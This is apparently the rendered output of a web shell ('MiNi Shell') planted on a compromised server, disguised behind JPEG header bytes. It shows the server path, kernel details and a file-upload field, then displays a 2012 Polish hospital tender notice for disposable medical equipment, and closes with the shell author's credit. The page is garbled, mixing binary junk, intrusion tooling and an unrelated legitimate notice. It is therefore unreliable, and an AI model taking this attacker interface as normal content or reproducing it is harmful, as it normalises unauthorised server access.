JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120731/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120731/165473-N-2012.html

<p class="kh_header"><b>Lubartów: Dostawy sprzętu medycznego jednorazowego użytku</b><br>
<b>Numer ogłoszenia: 165473 - 2012; data zamieszczenia: 31.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej , ul.  Cicha 14, 21-100 Lubartów, woj. lubelskie, tel. 81 855 66 08, faks 81 855 66 08.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawy sprzętu medycznego jednorazowego użytku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiot zamówienia stanowią dostwy sprzętu medycznego jednorazowego użytku w ilościach i asortymencie określonym w Załączniku nr 1 do SIWZ. ( w podziale na zadania):   Zadania 1 - 6.
1).  Zestawy do kaniulacji naczyń, przyrządy do przetaczania płynów i krwi.
2).  Igły i strzykawki.
3).  Pojemniki na zużyte igły, strzykawki
4).  Wzierniki, poliuretanowe zgłębniki z prowadnicą.
5).  Rurki intubacyjne i tracheostomijne.
6).  Probówki. 
1a.        Dotyczy Zadania Nr 6 - Probówki - Przedmiot zamówienia powinien posiadać: 
	- Możliwość pobierania krwi dwoma metodami: aspiracyjną i próżniową.
	- Brak powstawania w probówce zjawiska hemolizy i mikroskrzepów.
	- Stałe scalenie igły z łącznikiem (adapterem).
	- Możliwość współpracy z tradycyjnym systemem wkłuć (wenflon, cewnik, kaniula 	dotętnicza) oraz możliwość podania leku przy wykorzystaniu wkłucia igłą systemową.
	- Probówki wykonane z tworzywa sztucznego.
	- Probówki z odkręcanymi korkami, na każdej z nich naklejona czytelna etykieta na dane 	pacjenta.
	- Szczelność probówek w każdym położeniu i transporcie oraz podczas wirowania.
	-  Termin przydatności do użycia nie krótszy niż  24  miesięce, licząc od daty dostarczenia 	towaru do Zamawiającego.
	-  Możliwość utylizacji przez bezpyłowe spalanie do dwutlenku węgla i wody, potwierdzone 	stosownymi dokumentami.
	-  Wszystkie elementy oferowanego systemu (za wyjątkiem probówko-strzykawek, adapterów 	do rozmazów) mogące mieć kontakt z krwią (igły) powinny być pakowane pojedynczo w 	opakowaniach gwarantujących ich sterylność w formie gotowej do użycia po wyjęciu 	z opakowania, bez konieczności łączenia różnych elementów.
	-  Wszystkie elementy oferowanego systemu zamkniętego powinny pochodzić od jednego 	producenta. W przypadku zaoferowania elementów od różnych producentów należy 	przedłożyć oświadczenia tych producentów, iż oferowane elementy są ze sobą kompatybilne.
	-  Oferowany asortyment powinien posiadać kod barwny zgodny z międzynarodowymi 	standardami.
Wykonawca zobowiązuje się użyczyć (nieodpłatnie) statywów do OB na czas trwania umowy.

2.Wspólny Słownik Zamówień (CPV) : 33140000-3 - materiały medyczne; 
                                                                     33192500-7 - probówki.
3.Dopuszcza się składanie ofert częściowych.
4.Nie dopuszcza się składania ofert równoważnych.
5.Zamawiający wymaga aby: termin ważności na dostarczany przedmiot zamówienia wynosił min. 24 miesięcy  licząc od daty dostawy towaru do siedziby Zamawiającego.
6.Zamawiający wymaga, aby sprzęt sterylny jednorazowgo użytku oraz sprzęt biologicznie czysty jednorazowego użytku spełniał następujace kryteria:
 Każdy asortyment musi być zapakowany oddzielnie ( pojedynczo)
 Na każdym pojedynczym opakowaniu musí byc umieszczona data ważności.
 Na każdym pojedynczym opakowaniu musí być zaznaczone, że jest to produkt sterylny,   
         jednorazowego użytku
7.	W celu oceny jakości oraz zgodności z SIWZ dostarczanych wyrobów, Zamawiający 	wymaga złożenia próbek, w ilościach wskazanych poniżej (dostarczone próbki nie 	podlegaja zwrotowi) :

Zadanie 1.

Nazwa
Jednostka miary
Wymagana ilość próbek
1
Zestaw do kaniulacji dużych  naczyń  jednokanałowy, metodą Sseldingera jałowy nietoksyczny, w skład  zestawu wchodzi: 
kateter  jednokanałowy 6F x 20cm, rozmiar kanału 14G
prowadik J.0,38x60cm, rozszerzacz 7Fx12cm, igła prosta 18Gx7cm, strzykawka 10cm3, skalpel, motyl z zaciskiem.


sztuka


1
2
Przyrząd do przetaczania  płynów IS, dł. drenu 150 cm, komora kroplowa 20 kropli = 1 ml+,-0,1 ml, filtr płynu o wielkości oczek 15?m, dren medyczny o długości 150 cm, długa elastyczna komora kroplowa wolna od PVC. Dren pozbawiony ftalanów DEHP. Możliwość precyzyjnego ustawienia przepływu płynu.

sztuka

5
3
Przyrząd do przet. krwi TS dł. drenu 150 cm, komora kroplowa 20 kropli = 1 ml+,-0,1 ml, filtr płynu o wielkości oczek 200 ?m, dren medyczny o długości 150 cm, długa elastyczna komora kroplowa wolna od PVC.  Dren pozbawiony ftalanów DEHP. Możliwość precyzyjnego ustawienia przepływu płynu.

sztuka

2
4
Przedłużacz do pompy infuzyjnej, długość przedłużacza minimum 150 cm, średnica wew. 1,24 mm, sterylne.
sztuka
2

Zadanie 2.

Nazwa
Jednostka miary
Wymagana ilość próbek
1
Strzykawka dwuczęściowa j.u. poj. 2 ml, tłok szczelny, zapewniający płynny przepływ,  skala  czytelna i trwała, opak. a100 szt.
sztuka
5
2
Strzykawka dwuczęściowa j.u. poj. 5 ml, tłok szczelny, zapewniający płynny przepływ, skala  czytelna i trwała, opak. a100 szt.
sztuka
5
3
Strzykawka dwuczęściowa j.u. poj. 10 ml, tłok szczelny, zapewniający płynny przepływ, skala  czytelna i trwała, opak. a100 szt.
sztuka
5
4
Strzykawka dwuczęściowa j.u. poj. 20 ml, tłok szczelny, zapewniający płynny przepływ,  skala czytelna i trwała, opak. a100 szt.
sztuka
5
5
Strzykawka dwuczęściowa  j.u. do pomp infuzyjnych poj. 50(60) ml, stożek LUER-LOCK, z gumowym tłoczkiem uszczelniającym, dwustronna skala pomiarowa, czytelna i trwała skala, opak. typu blister-pack
sztuka
2
6
Strzykawka dwuczęściowa j.u., Janetta 100, do strzykawki załączana zmienna nasadka LUER, tłok z elastycznym uszczelnieniem zapewniający płynny przesuw, czytelna i trwała skala, opak.jednostk. typu blister-pack
sztuka
2
7
Strzykawka tuberkulinowa j.u.poj.1 ml, igła w zestawie nie połączona ze strzykawką, 0,45x13 mm, skala co 0,01 ml, opak. jednostk. typu blister-pack, opak. a100 szt. . Skala dobrze widoczna w czasie podawania szczepionki.
sztuka
2
8
Pojemnik pojedynczy do pobierania, przechowywania i preparatyki krwi 450 ml krwi
sztuka
1
9
Zaciskacz do pępowiny - dobrze zaciskający się.Bez możliwości zsunięcia z pępowiny
sztuka
5
10
Igła j.u. 0,45x16, sterylnie pakowana pojedynczo, opak. jednostk. oznakowane takim samym kolorem jak nasadka, opak. a100 szt.
sztuka
5
11
Igła j.u. 0,5x25, sterylnie pakowana pojedynczo, opak. jednostk. oznakowane takim samym kolorem jak nasadka, opak. a100 szt.
sztuka
5
12
Igła j.u. 0,6x30, sterylnie pakowana pojedynczo, opak. jednostk. oznakowane takim samym kolorem jak nasadka, opak. a100 szt.
sztuka
5
13
Igła j.u. 0,7x30, sterylnie pakowana pojedynczo, opak. jednostk. oznakowane takim samym kolorem jak nasadka, a100 szt.
sztuka
5
14
Igła j.u. 0,8x40, sterylnie pakowana pojedynczo, opak. jednostk. oznakowane takim samym kolorem jak nasadka, opak. a100 szt.
sztuka
5
15
Igła j.u. 0,9x40, sterylnie pakowane pojedynczo, opak. jednostk. oznakowane takim kolorem jak nasadka opak. a100 szt.
sztuka
5
16
Igła j.u. 0,9x50, sterylnie pakowane pojedynczo, opak. jednostk. oznakowane takim kolorem jak nasadka opak. a100 szt.
sztuka
2
17
Igła j.u. 1,2x40, sterylnie pakowane pojedynczo, opak. jednostk. oznakowane takim kolorem jak nasadka opak. a100 szt.
sztuka
5
18
Igła j.u. 1,1x40, sterylnie pakowane pojedynczo, opak. jednostk. oznakowane takim kolorem jak nasadka opak. a100 szt.
sztuka
5
19
Przyrząd do aspiracji leku z butelek, podstawowy typu Mini Spike, wyposażony w filtr bakteryjny 0,45 um z zastawką zabezpieczająca lek przed wyciekaniem po rozłączeniu strzykawki.
sztuka
2
20

Igła jednorazowa nr 0,5 mm typu motylek , sterylna, rozmiar 0,5 mmm x 19 mm , pakowana pojedynczo, opakowanie zbiorcze max 100szt
numer katalogowy 
sztuka
2
21
Igła jednorazowa nr 16, sterylna, rozmiar  1,6 mm x 40 mm
pakowana pojedynczo, opakowanie zbiorcze max 100szt
sztuka
2
22
Igła jednorazowa nr 18, sterylna, rozmiar  1,8 mm x 40 mm
pakowana pojedynczo, opakowanie zbiorcze max 100szt

sztuka
2
23
Kraniki trójdrożne Jednorazowego użytku, sterylny, z przezroczystą obudową, zakończenie kranika typu Luer lock, apirogenny, nietoksyczny, ze stabilnym i szczelnym połączeniem, kurek obrotowy obracany o 360°, oporny na ciśnienie do 4,5 bar

sztuka
2

Zadanie 3.

Nazwa
Jednostka miary
Wymagana ilość próbek
1
Pojemnik plastikowy na zużyte igły 0,2 - 05 L
sztuka
1
2
Pojemnik plastikowy na zużyte igły 0,7 L

sztuka
1
3
Pojemnik plastikowy na zużyte igły 1L 

sztuka
1
4
Pojemnik plastikowy na zużyte igły i strzykawki 2L
sztuka
1
5
Pojemnik plastikowy na zużyte igły i strzykawki 5L 

sztuka
1

Zadanie 4.

Nazwa
Jednostka miary
Wymagana ilość próbek
1
Wziernik ginekologiczny j.u. Cusco sterylny S.   Pakowany pojedynczo  w foliowym, szczelnym i trwałym opakowaniu.
sztuka
1
2
Wziernik ginekologiczny j.u. Cusco sterylny M.  Pakowany pojedynczo  w foliowym, szczelnym i trwałym opakowaniu.
sztuka
1
3
Wziernik ginekologiczny j.u. Cusco sterylny L.  Pakowany pojedynczo  w foliowym, szczelnym i trwałym opakowaniu.
sztuka
1

Zadanie 5

Nazwa
Jednostka miary
Wymagana ilość próbek


1
Rurki intubacyjne z mankietem niskociśnieniowym nr 6 Jednorazowego użytku, sterylny,  mankiet niskociśnieniowy, oczko Murphy ego, balonik kontrolny z zaworem zwrotnym na którym jest umieszczony nr rurki i nazwa producenta, dwa ringi pozwalające na określenie głębokości wg strun głosowych,  wykonane z PCV, silikonowane, nie zawierają  ftalanów.  Rozmiar rurki umieszczony w widocznym miejscu, cieniująca w promieniach RTG, podziałka na rurce  co 1 cm, trzy oznaczenia  rozmiaru na rurce, na baloniku, na łączniku, łącznik 15 mm trwale połączony z rurką i zgodny z ISO 5356-1, Pakowany pojedynczo

sztuka

1
2
Rurki intubacyjne z mankietem niskociśnieniowym  nr  8.
Jednorazowego użytku, sterylny,  mankiet niskociśnieniowy, oczko Murphy ego, balonik kontrolny z zaworem zwrotnym na którym jest umieszczony nr rurki i nazwa producenta, dwa ringi pozwalające na określenie głębokości wg strun głosowych,  wykonane z PCV, silikonowane, nie zawierają  ftalanów.  Rozmiar rurki umieszczony w widocznym miejscu, cieniująca w promieniach RTG, podziałka na rurce  co 1 cm, trzy oznaczenia  rozmiaru na rurce, na baloniku, na łączniku, łącznik 15 mm trwale połączony z rurką i zgodny z ISO 5356-1, Pakowany pojedynczo
sztuka
1
3
Rurki intubacyjne  z mankietem niskociśnieniowym  nr 7,.5
Jednorazowego użytku, sterylny,  mankiet niskociśnieniowy, oczko Murphy ego, balonik kontrolny z zaworem zwrotnym na którym jest umieszczony nr rurki i nazwa producenta, dwa ringi pozwalające na określenie głębokości wg strun głosowych,  wykonane z PCV, silikonowane, nie zawierają  ftalanów.  Rozmiar rurki umieszczony w widocznym miejscu, cieniująca w promieniach RTG, podziałka na rurce  co 1 cm, trzy oznaczenia  rozmiaru na rurce, na baloniku, na łączniku, łącznik 15 mm trwale połączony z rurką i zgodny z ISO 5356-1, Pakowany pojedynczo
sztuka
1
4
Rurki intubacyjne  z mankietem niskociśnieniowym nr 7.0
Jednorazowego użytku, sterylny,  mankiet niskociśnieniowy, oczko Murphy ego, balonik kontrolny z zaworem zwrotnym na którym jest umieszczony nr rurki i nazwa producenta, dwa ringi pozwalające na określenie głębokości wg strun głosowych,  wykonane z PCV, silikonowane, nie zawierają  ftalanów.  Rozmiar rurki umieszczony w widocznym miejscu, cieniująca w promieniach RTG, podziałka na rurce  co 1 cm, trzy oznaczenia  rozmiaru na rurce, na baloniku, na łączniku, łącznik 15 mm trwale połączony z rurką i zgodny z ISO 5356-1, Pakowany pojedynczo
sztuka
1
5
Rury tracheostomijne z mankietem niskociśnieniowym nr 8 bez ftalanów. Sterylna, jednorazowego użytku, z mankietem niskociśnieniowym zapewniającym szczelność dróg oddechowych, rozmiar rurki umieszczony w  widocznym miejscu, szyld na trwale przymocowany do rurki z wewnętrzna wyjmowaną prowadnicą, do szyldu przymocowane są tasiemki, które ułatwiają utrzymanie rurki w odpowiedniej pozycji i miejscu, Opakowanie typu Tywek
sztuka
1

Próbki winny znajdować się w oddzielnym opakowaniu niż oferta . 
Paczka z próbkami winna być oznaczona : Próbki do przetargu nieograniczonego na dostawy sprzętu medycznego jednorazowego użytku. Nr sprawy: SZP-26-2012. 
Wewnątrz należy umieścić informacje o nazwie i adresie Wykonawcy oraz informację, których zadań próbki dotyczą. 
Próbki  należy złożyć  w Sekretariacie SP ZOZ w Lubartowie  ul. Cicha 14  21-100 Lubartów do dnia  08.08. 2012 r. do godz. 10.00..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3, 33.19.25.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje tego warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, iż Wykonawca spełnia warunek posiadania wiedzy i doświadczenia  na 	podstawie przedstawionego wykazu zrealizowanych w ciągu ostatnich trzech lat (a jeśli okres 	prowadzenia działalności jest krótszy - w tym okresie) trzech dostaw sprzętu medycznego jednorazowego użytku  na kwotę nie mniejszą niż wartość sumy wartości zadań, na które Wykonawca 	złoży 	ofertę.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje tego warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje tego warunku.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje tego warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1.Oświadczenie Wykonawcy, że zaoferowane wyroby medyczne dopuszczone są do obrotu w Polsce zgodnie z ustawą z 20.05.2010 r. o wyrobach medycznych (Dz,U. Nr 107 poz 679).
2.Katalogi, prospekty, foldery zawierające dokładne opisy zaoferowanego sprzętu w języku polskim wraz z zaznaczeniem oferowanych pozycji.</p></li>



</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza następujące przesłanki do zmiany warunków zawartej umowy:
1.W przypadku zmiany stawki podatku VAT w trakcie trwania umowy dopuszcza się zmianę wartości umowy o różnicę wynikającą ze zmiany wartości podatku VAT. Taka zmiana może nastąpić po zaakceptowaniu przez Zamawiającego wniosku Wykonawcy zawierającego uzasadnienie faktyczne i prawne.
2.W przypadku zmiany technologii produkcji lub w przypadku zaistnienia innych okoliczności pozwalających na obniżenie ceny przedmiotu umowy, Wykonawca odpowiednio ją obniży.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.spzoz-lubartow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej w Lubartowie, ul. Cicha 14, 21-100 Lubartów, Sekcja Zamówień Publicznych i Zaopatrzenia pokój nr 15..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.08.2012 godzina 10:00, miejsce: Samodzielny Publiczny Zakład Opieki Zdrowotnej w Lubartowie, ul. Cicha 14, 21-100 Lubartów, Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com